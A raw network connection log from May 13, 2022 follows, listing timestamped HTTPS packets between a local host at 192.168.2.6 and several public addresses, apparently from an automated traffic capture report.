                                                                                                                                                                                                                            May 13, 2022 20:46:43.647469044 CEST44349848142.250.186.77192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.659712076 CEST49845443192.168.2.613.107.42.14
                                                                                                                                                                                                                            May 13, 2022 20:46:43.704396009 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.704432011 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.704508066 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.704799891 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.704817057 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.776000977 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.780931950 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.780953884 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.782083035 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.782162905 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.785743952 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.785881996 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.786048889 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.786062002 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.825692892 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828557968 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828614950 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828636885 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828697920 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828732014 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828749895 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828763008 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.828905106 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.869992018 CEST49850443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:43.870017052 CEST44349850149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.063023090 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.063071966 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.063155890 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.064939022 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.065009117 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.065102100 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.065917969 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.065942049 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.066204071 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.066242933 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.085279942 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.085331917 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.085407972 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.087390900 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.087419033 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.089651108 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.089682102 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.089764118 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.090322971 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.090365887 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.090457916 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.091223955 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.091248035 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.091315031 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.092586994 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.092607975 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.092806101 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.092838049 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.092978954 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.092995882 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.121758938 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.121788979 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.121851921 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.122168064 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.122180939 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.132859945 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.134998083 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.147663116 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.147695065 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.147927046 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.147959948 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.148027897 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.148304939 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.150065899 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.150186062 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.150770903 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.150926113 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.150983095 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.151062965 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.152651072 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.152913094 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.152940989 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.154201984 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.154264927 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.154728889 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.154853106 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.154877901 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.159507036 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.159667015 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.159938097 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.159962893 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.160098076 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.160118103 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.161166906 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.161247969 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.161314011 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.161531925 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.161550045 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.161659956 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.161720991 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.162345886 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.162417889 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.163018942 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.163105965 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.163144112 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.163254976 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.163789034 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.163897991 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.164004087 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.164016962 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.164175987 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.164194107 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.164360046 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.164376020 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.185159922 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.186409950 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.186435938 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.187484026 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.187582016 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.187840939 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.187871933 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.187931061 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.187936068 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.187978029 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.190721989 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.190828085 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.190908909 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.190926075 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.192503929 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.196506977 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.202429056 CEST49854443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.202466011 CEST44349854149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.204850912 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.204852104 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.209577084 CEST49861443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.209640026 CEST44349861149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.209748983 CEST49861443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.210053921 CEST49861443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.210076094 CEST44349861149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212096930 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212140083 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212183952 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212244987 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212249994 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212269068 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212275028 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212291002 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212317944 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212323904 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212327003 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212367058 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212450981 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.212454081 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.213270903 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.217448950 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.217519045 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.217535019 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.217581987 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.218353987 CEST49857443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.218380928 CEST44349857149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.224874020 CEST49862443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.224929094 CEST44349862149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.225040913 CEST49862443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.225390911 CEST49862443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.225420952 CEST44349862149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231440067 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231466055 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231560946 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231587887 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231604099 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231614113 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231642962 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231657028 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231659889 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231674910 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231684923 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231690884 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231708050 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231714010 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.231745005 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.234334946 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.238687992 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.238825083 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.238883018 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.238900900 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.238929987 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.238998890 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239022970 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239039898 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239058971 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239068031 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239074945 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239123106 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239204884 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239229918 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239238977 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239262104 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239264011 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239279985 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239284992 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239288092 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239296913 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239310980 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239360094 CEST44349858149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239361048 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239368916 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239391088 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239434004 CEST49858443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239455938 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239479065 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239500999 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239557028 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239566088 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239597082 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.239646912 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.248332977 CEST49860443192.168.2.6149.154.167.99
                                                                                                                                                                                                                            May 13, 2022 20:46:44.248359919 CEST44349860149.154.167.99192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.250349045 CEST49859443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.250365019 CEST44349859149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258054018 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258078098 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258160114 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258200884 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258204937 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258234978 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258244038 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258276939 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258284092 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258291006 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258313894 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258335114 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258368015 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258372068 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258400917 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258410931 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258439064 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258462906 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258517027 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258554935 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258579016 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258588076 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258615017 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258634090 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258636951 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258661032 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258690119 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258694887 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258721113 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258728981 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258754015 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258800983 CEST44349856149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.258843899 CEST49856443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.265810966 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.265839100 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.265908003 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.265970945 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.265997887 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266038895 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266047955 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266061068 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266076088 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266088963 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266097069 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266139030 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266176939 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266218901 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266237020 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266282082 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266290903 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266305923 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266407013 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266423941 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266465902 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266474009 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266508102 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266602993 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266619921 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266663074 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266673088 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266695976 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266752005 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266769886 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266803980 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266813040 CEST44349855149.154.164.13192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.266844034 CEST49855443192.168.2.6149.154.164.13
                                                                                                                                                                                                                            May 13, 2022 20:46:44.275707006 CEST49855443192.168.2.6149.154.164.13
